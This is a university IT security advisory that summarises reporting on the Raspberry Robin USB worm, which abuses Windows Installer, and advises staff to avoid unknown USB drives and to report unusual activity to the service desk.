USB-Based Wormable Malware Targets Windows Installer

Source: Threat Post

Background

A USB initiated cyber-attack refers to threat actors using a USB drive to spread malware.  In a targeted attack, infected USB drives are deliberately dropped in public locations, such as parking lots or cafes, to entice victims into picking it up and opening it on their own computers.  In the most basic of USB drop attacks, the user clicks on one of the files on the drive. This unleashes a malicious code that automatically activates upon viewing and can download further malware from the Internet.

Thumb drives are used pretty much everywhere nowadays. Whether a generic metallic memory stick, a branded giveaway at an event, or cleverly disguised as a pop culture icon, these devices are universally embraced as an easy way to transfer data.  Unfortunately, they’re also loved by cybercriminals, who can use thumb drives to attack your computer.

Once the drive is plugged in, the trouble begins.

The current threat

Malware, dubbed Raspberry Robin, has been active since last September and is finding its way through USB drives onto Windows machines to use Microsoft Standard Installer and other legitimate processes to install malicious files. Researchers at Red Canary Intelligence first began tracking the malicious activity when it began as a handful of detections with similar characteristics observed in multiple customers’ environments.

Once the malicious code, or worm, spreads via a USB drive to someone’s machine, the activity relies on standard Microsoft code to call out to its infrastructure.  Eventually the worm installs malicious files located on the infected USB.

Unanswered Questions

Though researchers observed various processes and executions by the malicious activity, they acknowledged that these observations have left a number of unanswered questions.

The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this infection occurs offline or “otherwise outside of our visibility,” researchers said.

They also don’t know why Raspberry Robin installs a malicious DLL, although they believe it may be to attempt to establish persistence on an infected system–though there is not enough evidence to make this conclusive, researchers acknowledged.

However, the biggest question mark surrounding the worm is the objective of the threat actors behind it, researchers said.

“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.

What you need to do

This form of introducing Malware has been know of for some time, however this new variant of attack is making use of standard Microsoft protocols.  Whilst this has been found on USB drives to date, it follows that the attackers are developing other ways to introduce malicious code using standard software update processes.

As an end user please follow simple cyber security procedures:

• Do not insert USB thumb drives from unknown sources into your PC. This includes those handed out at trade shows;
• Only install software updates from known sources – such as UNE software centre or verified vendor sites;
• Report any unusual activity to the Service Desk – 02 6773 5000.

If you haven’t already, we would encourage you to visit the UNE Cybersecurity page and undertake the UNE Mandatory Security Awareness raining.

Thanks for your support in helping us maintain the cyber security integrity of UNE.